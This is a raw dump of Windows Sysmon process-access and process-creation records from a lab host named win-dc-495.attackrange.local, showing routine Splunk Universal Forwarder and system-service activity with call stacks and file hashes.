13:36:37.452{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003864Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.452{59A5CD1D-8EE5-6005-C700-00000000A301}39043724C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8EE5-6005-C800-00000000A301}4896C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003863Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.454{59A5CD1D-8EE5-6005-C800-00000000A301}4896C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk 
ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-strptime --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8EE5-6005-C700-00000000A301}3904C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warnings 10341000x80000000000000003862Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.436{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE5-6005-C700-00000000A301}3904C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003861Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:37.436{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003860Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.436{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003859Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:37.436{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003858Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.436{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003857Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:37.436{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003856Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.436{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003855Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:37.436{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003854Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.436{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003853Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:37.436{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003852Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.436{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EE5-6005-C700-00000000A301}3904C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003851Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.436{59A5CD1D-8EE4-6005-C200-00000000A301}24882604C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8EE5-6005-C700-00000000A301}3904C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18192|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003850Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.448{59A5CD1D-8EE5-6005-C700-00000000A301}3904C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8EE4-6005-C200-00000000A301}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000003849Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.358{59A5CD1D-8EE5-6005-C600-00000000A301}45764648C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000003848Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.108{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE5-6005-C600-00000000A301}4576C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003847Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.108{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003846Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:37.108{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003845Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.108{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003844Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:37.108{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003843Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.108{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003842Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:37.108{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003841Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.108{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003840Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:37.108{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EE5-6005-C600-00000000A301}4576C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003839Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.108{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003838Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
